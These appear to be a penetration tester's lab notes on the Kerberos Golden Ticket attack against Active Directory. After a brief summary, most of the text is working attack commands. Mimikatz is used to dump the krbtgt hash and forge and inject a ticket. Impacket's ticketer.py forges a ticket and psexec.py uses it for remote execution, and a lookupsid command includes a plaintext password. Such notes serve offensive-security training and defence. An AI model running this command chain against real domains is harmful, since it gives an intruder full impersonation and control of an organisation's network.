<aside> 📌 Summary
</aside>
A Golden Ticket attack is a sophisticated technique used by attackers to forge a special type of Kerberos ticket in Microsoft Active Directory. By compromising the AD's KRBTGT account password hash, attackers can create these "golden tickets" with virtually unlimited access and validity. This allows them to impersonate any user or system, granting unauthorized access to resources and services. As a penetration tester, the golden ticket attack showcases the potential risk of compromised privileged accounts and highlights the importance of securing AD's KRBTGT account and enforcing strong authentication mechanisms to thwart such attacks.
Once we loaded Mimikatz, we check privileges with privilege::debug. Then we can look at the domain’s SID and the krbtgt hash with
lsadump::lsa /inject /name:krbtgt
Then we can use another module named kerberos
kerberos::golden /User:Administrator /domain:ORB.local /sid:<SID> /krbtgt:<Hash> /id:500 /ptt
kerberos::golden /User:Administrator /domain:ORB.local /sid:S-1-5-21-1854181339-1499107752-1584228225 /krbtgt:bd4fa474174f84467b4b05dd3ec0bcf1 /id:500 /ptt
/User no need to use a real user, any string will work/id is the Rid/ptt for pass the ticket to the next session
Then (when on an RDP session), you can run the following command to get a session with a golden ticket
misc::cmd
ticketer.pyImpacket Deep Dives Vol. 2: Attacking Kerberos
Another way to create golden tickets is with the Impacket library
ticketer.py -nthash <krbtgt/service nthash> -domain-sid <your domain SID> -domain <your domain FQDN> baduser
ticketer.py -domain ORB.local -domain-sid S-1-5-21-1854181339-1499107752-1584228225 -nthash bd4fa474174f84467b4b05dd3ec0bcf1 lkisaka -user-id 1105
<aside>
💡 According to this post https://github.com/fortra/impacket/issues/1565, the exploit now need a valid user and its RID, we can retrieve those information along the SID of the domain with lookupsid.py ORB.local/Administrator:'P@$$w0rd!'@10.0.0.12
</aside>
This will create a file that we need to put in the variable KRB5CCNAME to use then the -k flag of any impacket tool
export KRB5CCNAME=/home/zhou/lkisaka.ccache
psexec.py ORB.local/[email protected] -target-ip 10.0.0.131 -dc-ip 10.0.0.12 -no-pass -k
